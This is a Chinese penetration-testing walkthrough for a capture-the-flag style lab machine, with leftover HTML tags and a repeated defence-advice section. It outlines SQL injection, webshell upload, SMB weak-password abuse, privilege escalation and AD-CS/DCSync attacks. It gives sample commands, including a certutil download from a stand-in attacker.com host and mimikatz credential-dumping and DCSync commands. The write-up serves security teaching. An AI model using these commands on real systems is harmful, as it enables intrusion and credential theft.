CyberStrikeLab-Lab9 靶机渗透测试教学文档<\/h1>

1. 靶机基本信息与攻击路径概述<\/h2>

主要攻击路径<\/strong>：

通过 CMSeasy SQL 注入获取后台管理员凭证<\/li>
利用 CMSeasy 7.7.5 后台任意文件上传漏洞获取 WebShell<\/li>
内网渗透发现 SMB 弱口令<\/li>
提权至 SYSTEM 账户获取机器 Hash<\/li>
利用 AD-CS (Active Directory 证书服务)漏洞横向移动<\/li>
最终通过 DCSync 获取域控权限<\/li> <\/ul> <\/li> <\/ul>
2. Flag01 获取过程<\/h2>
2.1 信息收集<\/h3>

对目标进行常规端口扫描和服务识别<\/li>
发现 CMSeasy CMS 系统<\/li> <\/ul>
2.2 CMSeasy SQL 注入获取管理员凭证<\/h3>

发现注入点<\/strong>：<\/p>

通过测试发现 CMSeasy 存在 SQL 注入漏洞<\/li> <\/ul> <\/li>

利用注入获取管理员凭证<\/strong>：<\/p>

通过 SQL 注入获取管理员用户名和密码哈希<\/li>
获取的凭证：admin:admin123456<\/code><\/li>
使用 MD5 解密工具破解密码哈希<\/li> <\/ul> <\/li> <\/ol> 2.3 CMSeasy 7.7.5 后台任意文件上传<\/h3> 登录后台<\/strong>：<\/p> 使用获取的凭证 admin:admin123456<\/code> 登录 CMS 后台<\/li> <\/ul> <\/li> 获取有效 Cookie<\/strong>：<\/p> 记录登录后的会话 Cookie<\/li> <\/ul> <\/li> 利用文件上传漏洞<\/strong>：<\/p> 通过构造特定请求实现任意文件上传<\/li> 上传 PHP WebShell 文件<\/li> <\/ul> <\/li> <\/ol> 2.4 获取 WebShell<\/h3> 连接 WebShell<\/strong>：<\/p> 使用蚁剑等工具连接上传的 WebShell<\/li> 确认 WebShell 功能正常<\/li> <\/ul> <\/li> 初步权限确认<\/strong>：<\/p> 通过 WebShell 确认当前用户权限<\/li> 发现系统存在双网卡，连接内网 10.0.0.0\/24 网段<\/li> <\/ul> <\/li> <\/ol> 3. Flag02 获取过程<\/h2> 3.1 内网代理搭建<\/h3> 选择代理工具<\/strong>：<\/p> 使用 stowaway 搭建内网代理<\/li> <\/ul> <\/li> 工具上传问题<\/strong>：<\/p> 注意：蚁剑上传大文件可能不完整<\/li> 解决方案：使用 certutil<\/code> 命令下载 stowaway 客户端<\/li> 示例命令： certutil -urlcache -split -f http:\/\/attacker.com\/stowaway.exe stowaway.exe <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 3.2 内网扫描<\/h3> 扫描工具选择<\/strong>：<\/p> 推荐将 fscan 等扫描工具直接上传到目标机器<\/li> 避免通过代理扫描导致速度过慢<\/li> <\/ul> <\/li> 扫描执行<\/strong>：<\/p> 通过 stowaway 代理开启 shell 执行 fscan<\/li> 扫描结果分析：发现 SMB 服务存在弱口令<\/li> 识别域环境及相关服务<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 3.3 SMB 弱口令利用<\/h3> 检测确认<\/strong>：<\/p> 验证 SMB 弱口令有效性<\/li> 确认是本地管理员账户<\/li> <\/ul> <\/li> 连接方法<\/strong>：<\/p> 使用 SMBEXEC 或 WMI 连接<\/li> 示例命令： python smbexec.py user:password@10.0.0.x <\/code><\/pre> <\/li> <\/ul> <\/li> 权限确认<\/strong>：<\/p> 检查当前权限<\/li> 发现 SeImpersonatePrivilege<\/code> 特权存在<\/li> <\/ul> <\/li> <\/ol> 3.4 RDP 连接配置<\/h3> 启用 RDP<\/strong>：<\/p> 作为管理员启用 3389 端口<\/li> 命令： reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f <\/code><\/pre> <\/li> <\/ul> <\/li> 防火墙配置<\/strong>：<\/p> 添加防火墙规则允许 RDP<\/li> 命令： netsh advfirewall firewall add rule name="Open RDP" dir=in action=allow protocol=TCP localport=3389 <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 3.5 提权至 SYSTEM 并获取机器 Hash<\/h3> 提权工具选择<\/strong>：<\/p> 使用 SweetPotato 进行提权<\/li> 上传 SweetPotato 和 mimikatz 到目标<\/li> <\/ul> <\/li> 提权执行<\/strong>：<\/p> 通过 SweetPotato 从管理员提升至 SYSTEM<\/li> 命令示例： SweetPotato.exe -c "whoami" <\/code><\/pre> <\/li> <\/ul> <\/li> 获取机器 Hash<\/strong>：<\/p> 使用 mimikatz 获取机器账户 Hash<\/li> 命令： mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit <\/code><\/pre> <\/li> 获取到机器用户 CYBERWEB$<\/code> 的 Hash<\/li> <\/ul> <\/li> <\/ol> 4. Flag03 获取过程<\/h2> 4.1 AD-CS (Active Directory 证书服务)攻击<\/h3> 获取 CA 名称<\/strong>：<\/p> 需要 SYSTEM 权限与域通信<\/li> 命令： certutil -config - -ping <\/code><\/pre> <\/li> 获取 CA 名称：cyberstrikelab-DC-CA<\/code><\/li> <\/ul> <\/li> 配置 hosts 文件<\/strong>：<\/p> 添加域控解析记录<\/li> 命令： echo 10.0.0.x cyberstrikelab-DC >> C:\Windows\System32\drivers\etc\hosts <\/code><\/pre> <\/li> <\/ul> <\/li> 利用机器用户 Hash 攻击<\/strong>：<\/p> 使用 CYBERWEB$<\/code> 机器用户 Hash 创建新机器用户<\/li> 为新机器用户申请证书<\/li> 利用证书获取域控机器账号 Hash<\/li> <\/ul> <\/li> <\/ol> 4.2 DCSync 攻击<\/h3> 执行 DCSync<\/strong>：<\/p> 使用域控机器 Hash 执行 DCSync<\/li> 获取域内所有用户 Hash<\/li> <\/ul> <\/li> 命令示例<\/strong>：<\/p> mimikatz.exe "lsadump::dcsync \/domain:cyberstrikelab \/user:krbtgt" exit <\/code><\/pre> <\/li> <\/ol> 4.3 Pass-the-Hash (PTH) 攻击<\/h3> 横向移动<\/strong>：<\/p> 使用获取的域控 Hash 进行 PTH<\/li> 获取域控完全控制权限<\/li> <\/ul> <\/li> 获取 Flag03<\/strong>：<\/p> 在域控上定位并读取 flag03 文件<\/li> <\/ul> <\/li> <\/ol> 5. 关键工具与命令总结<\/h2> 工具\/命令<\/th> 用途<\/th> <\/tr> <\/thead> certutil<\/td> 文件下载、CA 信息查询<\/td> <\/tr> stowaway<\/td> 内网代理搭建<\/td> <\/tr> fscan<\/td> 内网扫描<\/td> <\/tr> SweetPotato<\/td> Windows 提权<\/td> <\/tr> mimikatz<\/td> 凭证提取、DCSync<\/td> <\/tr> smbexec\/WMI<\/td> SMB 弱口令利用<\/td> <\/tr> RDP<\/td> 图形化界面操作<\/td> <\/tr> <\/tbody> <\/table> 6. 防御建议<\/h2> 针对 CMSeasy<\/strong>：<\/p> 及时更新 CMS 到最新版本<\/li> 限制后台文件上传类型<\/li> <\/ul> <\/li> 针对 SMB<\/strong>：<\/p> 禁用 SMBv1<\/li> 设置强密码策略<\/li> 限制 SMB 访问来源<\/li> <\/ul> <\/li> 针对 AD-CS<\/strong>：<\/p> 启用证书服务审计<\/li> 限制证书模板权限<\/li> 监控异常证书请求<\/li> <\/ul> <\/li> 通用防御<\/strong>：<\/p> 启用 Windows 事件日志<\/li> 部署 EDR 解决方案<\/li> 定期进行渗透测试<\/li> <\/ul> <\/li> <\/ol>

工具\/命令<\/th>	用途<\/th> <\/tr> <\/thead>
certutil<\/td>	文件下载、CA 信息查询<\/td> <\/tr>
stowaway<\/td>	内网代理搭建<\/td> <\/tr>
fscan<\/td>	内网扫描<\/td> <\/tr>
SweetPotato<\/td>	Windows 提权<\/td> <\/tr>
mimikatz<\/td>	凭证提取、DCSync<\/td> <\/tr>
smbexec\/WMI<\/td>	SMB 弱口令利用<\/td> <\/tr>
RDP<\/td>	图形化界面操作<\/td> <\/tr> <\/tbody> <\/table> 6. 防御建议<\/h2> 针对 CMSeasy<\/strong>：<\/p> 及时更新 CMS 到最新版本<\/li> 限制后台文件上传类型<\/li> <\/ul> <\/li> 针对 SMB<\/strong>：<\/p> 禁用 SMBv1<\/li> 设置强密码策略<\/li> 限制 SMB 访问来源<\/li> <\/ul> <\/li> 针对 AD-CS<\/strong>：<\/p> 启用证书服务审计<\/li> 限制证书模板权限<\/li> 监控异常证书请求<\/li> <\/ul> <\/li> 通用防御<\/strong>：<\/p> 启用 Windows 事件日志<\/li> 部署 EDR 解决方案<\/li> 定期进行渗透测试<\/li> <\/ul> <\/li> <\/ol>